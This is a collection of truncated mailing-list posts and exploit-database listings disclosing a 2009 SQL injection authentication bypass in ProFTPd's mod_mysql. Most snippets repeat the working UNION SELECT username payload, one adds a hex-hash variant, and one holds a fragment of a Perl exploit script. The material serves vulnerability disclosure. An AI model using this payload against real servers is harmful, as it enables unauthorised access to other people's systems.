Another SQL injection in ProFTPd with mod_mysql (probably postgres as well)

Hello, Just found out a problem with proftpd's sql authentication. The problem is easily reproducible if you login with username like: USER ' and 1=2 union select 1,1,uid,gid,homedir,shell from users; -- and a password of "1" without quotes. which leads to a successful login. Different account...

Re: Re: Another SQL injection in ProFTPd with mod_mysql (probably postgres as well)

Uh-oh, sorry, bad copy-paste..the user is just ' and 1=2 union select 1,1,uid,gid,homedir,shell from users; -- not USER ' and 1=2 union select 1,1,uid,gid,homedir,shell from users; -- I am using debian packaged proftpd 1.3.1-16 if that matters...

Re: Another SQL injection in ProFTPd with mod_mysql (probably postgres as well)

Maybe this is related to http://bugs.proftpd.org/showbug.cgi?id=3173 ? That bug only applies to 1.3.1, so 1.3.0 is not affected. 1.3.2 is supposed to fix this bug. Sergio Aguayo ----- Original Message ----- From: [email protected] To: [email protected] Sent: Tuesday, February 10, 2009...

Re: Another SQL injection in ProFTPd with mod_mysql (probably postgres as well)

Looks like a very serious issue to me - it works on our ProFTPD 1.3.2rc2 Server latest stable on gentoo. 220 ProFTPD 1.3.2rc2 Server Pumpkin xx.xx.xx.xx USER ' and 1=2 union select 1,0x24312452565a583533784324716a304d4d6b4670426b4b486177644264756634392f,uid,gid,homedir,shell from ftp 331 Password...

ProFTPd With mod_mysql Authentication Bypass

Credits Go For gat3way For Finding The Bug ! AT http://milw0rm.com/exploits/8037 Exploited By AlpHaNiX HomePage NullArea.Net Greetz For Zigma-Djekmani-r1z use Net::FTP; if @ARGV new"$host", Debug = 0 or die "! Cannot connect to $host"; $ftp-login"$user","$pass" or die "\n\n! Couldn't ByPass The...

ProFTPd with mod_mysql Authentication Bypass Vulnerability

No description provided by source. Just found out a problem with proftpd's sql authentication. The problem is easily reproducible if you login with username like: USER %' and 1=2 union select 1,1,uid,gid,homedir,shell from users; -- and a password of "1" without quotes. which leads to a successfu...

ProFTPd with mod_mysql Authentication Bypass Vulnerability

Exploit for multiple platform in category remote exploits ========================================================== ProFTPd with modmysql Authentication Bypass Vulnerability ========================================================== Just found out a problem with proftpd's sql authentication. The...

ProFTPd - mod_mysql Authentication Bypass

ProFTPd - modmysql Authentication Bypass Just found out a problem with proftpd's sql authentication. The problem is easily reproducible if you login with username like: USER %' and 1=2 union select 1,1,uid,gid,homedir,shell from users; -- and a password of "1" without quotes. which leads to a...

ProFTPd - 'mod_mysql' Authentication Bypass

Just found out a problem with proftpd's sql authentication. The problem is easily reproducible if you login with username like: USER %' and 1=2 union select 1,1,uid,gid,homedir,shell from users; -- and a password of "1" without quotes. which leads to a successful login. Different account logins c...